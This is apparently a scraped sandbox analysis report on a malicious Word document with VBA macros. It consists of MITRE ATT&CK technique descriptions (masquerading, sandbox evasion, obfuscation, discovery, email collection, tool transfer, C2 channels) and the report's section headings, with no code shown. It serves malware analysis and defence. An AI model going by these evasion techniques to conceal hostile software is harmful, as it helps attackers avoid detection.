Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Authentication logs, Email gateway, File monitoring, Mail server, Office 365 trace logs, Process monitoring, Process use of network
Platforms:	Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report documenti 12.01.20.doc

Overview

General Information

Detection

Signatures

Classification

Startup

Malware Configuration

Yara Overview

Sigma Overview

System Summary:

Signature Overview

AV Detection:

Software Vulnerabilities:

Networking:

System Summary:

Data Obfuscation:

Persistence and Installation Behavior:

Boot Survival:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static OLE Info

General

OLE File "/opt/package/joesandbox/database/analysis/326338/sample/documenti 12.01.20.doc"

Indicators

Summary

Document Summary

Streams with VBA

VBA File Name: ThisDocument.cls, Stream Size: 1127

General

VBA Code Keywords

VBA Code

VBA File Name: a7A5m.bas, Stream Size: 5178

General

VBA Code Keywords

VBA Code

VBA File Name: aH8xms.bas, Stream Size: 863

General

VBA Code Keywords

VBA Code

VBA File Name: aIsb7.bas, Stream Size: 5040